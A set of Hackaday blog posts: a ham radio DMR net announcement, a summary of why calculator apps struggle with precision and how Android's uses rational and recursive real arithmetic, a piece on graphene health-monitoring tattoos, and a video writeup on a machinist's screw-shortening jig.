And finally, calling all hams, or at least those of us with an interest in digital modes. Our own Al Williams will be making an appearance on the DMR Tech Net to talk about his Hackaday recent article on Digital Mobile Radio. The discussion will be on Monday, February 17 at 00:30 UTC (19:30 EST), on Brandmeister talk group 31266. If you’ve got a DMR-capable radio, DMR Tech Net has a handy guide to getting the talk group into your code plug. If none of that makes any sense, relax — you can still tune in online using this link and the Player button in the upper right. Or, if ham radio isn’t your thing, Al will be making a second appearance the next night but on a Zoom call to discuss “How to Become Rich and (almost) Famous on Hackaday,” which is his collection of tips and tricks for getting your project to catch a Hackaday writer’s eye.
How Hard is it to Write a Calculator App?
How hard can it be to write a simple four-function calculator program? After all, computers are good at math, and making a calculator isn’t exactly blazing a new trail, right? But [Chad Nauseam] will tell you that it is harder than you probably think. His post starts with a screenshot of the iOS calculator app with a mildly complex equation. The app’s answer is wrong. Android’s calculator does better on the same problem.
What follows is a bit of a history lesson and a bit of a math lesson combined. As you might realize, the inherent problem with computers and math isn’t that they aren’t good at it. Floating point numbers have a finite precision and this leads to problems, especially when you do operations that combine large and small numbers together.
Indeed, any floating point representation has a bigger infinity of numbers that it can’t represent than those that it can. But the same is true of a calculator. Think about how many digits you are willing to type in, and how many digits you want out. All you want is for each of them to be correct, and that’s a much smaller set of numbers.
Google’s developer, [Hans-J. Boehm] tackled this problem by turning to recursive real arithmetic (RRA). Here, each math function is told how accurate it needs to be, and a set of rules determines the highest required accuracy.
But every solution brings a problem. With RRA, there is no way to tell very small numbers from zero. So computing “1-1” might give you “0.000000000”, which is correct but upsetting because of all the excess precision. You could try to test if “0.00000000” was equal to “0”, and simplify the output. But testing for equality of two numbers in RRA is not guaranteed to terminate: you can tell if two numbers are unequal by going to more and more precision until you find a difference, but if the numbers happen to be equal, this procedure never ends.
The key realization for [Boehm] and his collaborators was that you could use RRA only for cases where you deal with inexact numbers. Most of the time, the Android calculator deals with rationals. However, when an operation produces a potentially irrational result, it switches to RRA for the approximation, which works because no finite representation ever gets it exactly right. The result is a system that doesn’t show excess precision, but correctly displays all of the digits that it does show.
We really like [Chad’s] step-by-step explanation. If you would rather dive into the math, you can read [Boehm’s] paper on the topic. If you ever wonder how many computer systems handle odd functions like sine and cosine, read about CORDIC. Or, avoid all of this and stick to your slide rule.
Graphene Tattoos: The Future of Continuous Health Monitoring?
In the near future, imagine a world where your health is continuously monitored, not through bulky devices but through an invisible graphene tattoo. Developed at the University of Massachusetts Amherst, these tattoos could soon detect a range of health metrics, including blood pressure, stress levels, and even biomarkers of diseases like diabetes. This technology, though still in its infancy, promises to revolutionize how we monitor health, making it possible to track our bodies’ responses to everything from exercise to environmental exposure in real-time.
Graphene, a single layer of carbon atoms, is key to the development of these tattoos. They are flexible, transparent, and conductive, making them ideal for bioelectronics. The tattoos are so thin and pliable that users won’t even feel them on their skin. In early tests, graphene electronic tattoos (GETs) have been used to measure bioimpedance, which correlates with blood pressure and other vital signs. The real breakthrough here, however, is the continuous, non-invasive monitoring that could enable early detection of conditions that usually go unnoticed until it’s too late.
While still requiring refinement, this technology is advancing rapidly. Graphene still amazes us, but it’s no longer just science fiction. Soon, these tattoos could be a part of everyday life, helping individuals track their health and enabling better preventative care. Since we’re hackers out here – but this is a far fetch – combining this knowledge on graphene production, and this article on tattooing with a 3D printer, could get you on track. Let us know, what would you use graphene biosensors for?
Original photo by engin akyurt on Unsplash
[Quinn Dunki] Makes a Screw Shortener Fit for Kings
It’s common problem when you’re building anything with screws: this one is too long, this one is too short. While she can’t teach you how to fix the latter, [Quinn Dunki] has made herself an absolutely deluxe screw shortening jig. And while that’s cool and all, the real value here is the journey; watching over [Quinn]’s shoulders while she’s in the machine shop is always illuminating.
This video is, on the surface, about making an improved tool out of steel. But it’s the tips along the way that make it worth your watch. For instance “deburr early and often” is a recurring leitmotif here: it keeps the extra bits that form along any cut from messing up edge finding or vise registration. And yeah, she deburrs after every operation.
There are mistakes, and lessons learned along the way. We’re not going to spoil it all. But in the end, it’s a sweet tool that we’ve never seen before.
If you haven’t read [Quinn]’s series on machine tools that she wrote for us, it’s a treasure trove of machining wisdom.
youtube.com/embed/pLca-flylUA?…